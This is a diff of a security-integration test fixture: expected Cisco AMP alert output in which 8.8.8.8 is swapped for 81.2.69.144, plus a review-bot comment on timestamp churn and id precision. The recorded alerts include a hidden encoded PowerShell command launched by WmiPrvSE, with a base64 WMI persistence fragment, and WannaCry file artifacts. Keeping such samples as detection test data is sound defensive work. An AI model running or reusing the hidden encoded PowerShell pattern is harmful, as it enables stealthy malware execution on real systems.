BhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==\"],\"cmd_line\":\"powershell.exe -NoP -NonI -W Hidden -E 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\",\"parent_app\":\"WmiPrvSE.exe\",\"parent_app_path\":\"C:\\\\Windows\\\\System32\\\\wbem\",\"parent_pid\":2236,\"parent_puid\":132461352663910600,\"parent_user\":\"SYSTEM\",\"parent_user_sid\":\"010100000000000512000000\",\"pid\":10724,\"puid\":132465072105597400,\"ts\":1602033881727175700,\"user\":\"user@testdomain.com\",\"user_sid\":\"010100000000000512000000\"}}],\"limited\":false,\"matched\":1},\"schema\":\"endpoint\",\"schema_epoch\":2,\"sig_id\":20190517123456,\"sig_rev\":5},\"detection\":\"apde:20190517123456\",\"end_ts\":1610640884,\"engine\":\"apde\",\"id\":\"d2616Ab846\",\"name\":\"WMIPRVSE Launched Encoded Powershell Command\",\"observables\":{\"file\":[{\"md5\":\"a575a7610e5f003cc36df39e07c4ba7d\",\"name\":\"powershell.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\",\"properties\":{\"copyright\":\"© Microsoft Corporation. All rights reserved.\",\"file_version\":\"10.0.14409.1005\",\"product\":\"Microsoft® Windows® Operating System\",\"product_version\":\"10.0.14409.1005\"},\"sha1\":\"88e7cdc0b75364418e11b2c53f772085f1b61d1e\",\"sha256\":\"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218\",\"size\":443392,\"type_id\":1},{\"md5\":\"d683c112190f4b4c6d477d693ee88e35\",\"name\":\"WmiPrvSE.exe\",\"path\":\"C:\\\\Windows\\\\System32\\\\wbem\",\"properties\":{\"copyright\":\"© Microsoft Corporation. 
All rights reserved.\",\"file_version\":\"10.0.14409.1005\",\"product\":\"Microsoft® Windows® Operating System\",\"product_version\":\"10.0.14409.1005\"},\"sha1\":\"67858ead93feed62c0b1865369840e6e8086f53b\",\"sha256\":\"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334\",\"size\":425984,\"type_id\":1}]},\"remediated\":false,\"severity\":\"medium\",\"silent\":false,\"start_ts\":1610640884,\"tactics\":[\"TA0002\",\"TA0005\",\"TA0008\"],\"type\":\"activity\",\"normalized\":{\"observables\":{\"file\":{\"name\":[\"powershell.exe\",\"wmiprvse.exe\"],\"path\":[\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\",\"c:\\\\windows\\\\system32\\\\wbem\"]}},\"name\":\"wmiprvse launched encoded powershell command\"},\"ts\":1610640884},\"tactics\":[\"TA0002\",\"TA0005\",\"TA0008\"]}}", "code": "553648222", "kind": "alert", "action": "Threat Detection", @@ -2609,7 +2609,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "connector_guid": "test_connector_guid", "related": { @@ -2645,7 +2645,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
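Review bot: The `ingested` values in this hunk and in the @@ -2395, @@ -2655, @@ -2731, @@ -2807 and @@ -2883 hunks change for no reason tied to the IP fix, e.g. `+ "ingested": "2021-12-09T13:35:47.010789100Z"`, which is regeneration noise that will reappear on every `--generate` run. If this data stream's pipeline test config does not already list `event.ingested` under `dynamic_fields`, adding it there would keep future fixture diffs limited to intentional changes such as the `81.2.69.144` substitution. If the reason for moving to that address is that the test GeoIP database covers it, I would also expect the expected output to gain geo-derived fields wherever the pipeline enriches `computer.external_ip`; none appear in these hunks, so it is worth confirming that the enrichment is actually exercised or that the fields land elsewhere in the file. Not introduced by this change, but `\"id\":6880683125978957000` on the new side ends in three zeros (compare `\"id\":6412622782676337000` against `\"detection_id\":\"6412622782676336644\"` in the @@ -2395 hunk), which indicates the numeric id has already lost precision through a double-precision parse, so any correlation should key on the string `detection_id` rather than the number.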
@@ -2655,8 +2655,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798723167Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":717000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204897366867969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010792400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":717000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine 
Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204897366867969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260893", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -2676,7 +2676,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2721,7 +2721,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2731,8 +2731,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798725403Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010796400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine 
Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260893", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -2752,7 +2752,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2797,7 +2797,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2807,8 +2807,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798727650Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229327140847665\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010801700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine 
Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229327140847665\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260893", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -2828,7 +2828,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2873,7 +2873,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2883,8 +2883,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798730065Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":639000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204897366867977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010807200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":639000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine 
Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204897366867977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260893", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -2904,7 +2904,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2951,7 +2951,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2965,8 +2965,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798732325Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831755\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010812400Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831755\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -2988,7 +2988,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3031,7 +3031,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3045,8 +3045,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798734619Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831754\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010817700Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831754\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -3068,7 +3068,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3111,7 +3111,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3125,8 +3125,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:10.798736861Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":873000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831753\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"qeriuwjhrf\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\qeriuwjhrf\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:47.010823Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":873000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831753\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"qeriuwjhrf\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\qeriuwjhrf\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -3148,7 +3148,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3191,7 +3191,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] 